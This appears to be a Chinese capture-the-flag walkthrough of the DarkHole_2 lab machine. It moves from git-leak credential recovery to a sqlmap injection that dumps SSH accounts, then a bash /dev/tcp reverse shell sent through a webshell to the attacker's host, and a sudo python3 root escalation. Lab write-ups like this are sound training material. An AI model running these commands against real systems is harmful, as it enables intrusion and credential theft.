DarkHole_2靶机渗透攻略

信息收集

主机发现

nmap -sC -sV 192.168.93.0/24 -p-

目标：192.168.93.134 开放22ssh，80http

网站信息收集

并未发现太多信息

但是根据nmap的扫描结果可知，目录192.168.93.134:80/.git/ 存在git泄露。

git泄露漏洞利用

下载git源码

python2 GitHack.py

密码逻辑流程

在logon.php中可以发现用户、密码的处理逻辑

将/.git下载到本地 wget -r http://192.168.93.134/.git

使用 git clone .git webapp

命令会将该目录创建一个webapp的源码文件，可以在其中执行所有 git 操作。

在webap下用git log ，发现在git日志当中存在修改记录，切换到该条记录下

git log

git checkout a4d9 切换到master a4的带有I added login.php file with default credentials

vim login.php 查看登录文件

账密：lush@admin.com 321

登录后台成功

漏洞利用sql注入

http://192.168.93.134/dashboard.php?id=1 此后台url非常的诱人

查看cookie PHPSESSID:“hf076rm7rggldol19i8d5qmc3j”

sqlmap直接一把梭

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j --dbs

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 --tables

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 -T ssh --dump

得到ssh 账户 jehad fool

webshell利用

ssh登陆之后发现为普通用户

sudo suid 系统内核版本 ssh免密登录等未发现利用方式

cat /etc/crontab 发现存在计划任务

本地还在监听一个奇怪的端口9999与losy用户计划任务的端口一样

dao opt下的web发现index.php是一个webshell

查看历史命令记录

尝试利用webshell

由于开放的127.0.0.1:9999 ,kali无法访问，只有靶机可访问，弹shell失败因此需要将端口带出内网

webshell利用 ssh正向代理

因为当前我们拥有ssh的账密，因此使用ssh隧道是不二选择 ssh -L 9999:127.0.0.1:9999 jehad@192.168.93.134

getshell

反弹shell bash -c bash -i >& /dev/tcp/192.168.93.130/7777 0>&1 进行url编码

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27 kali监听7777

靶机通过get方式传参执行命令 http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27

在losy家目录下拿到第一面flag

提权

查看losy的历史命令发现密码

sudo -l 查看，发现可用root身份执行python3

结合前面的历史命令 python调sh

`sudo /usr/bin/python3 -c ‘import os; os.system("/bin/sh")’

`

成功提权，夺旗通关！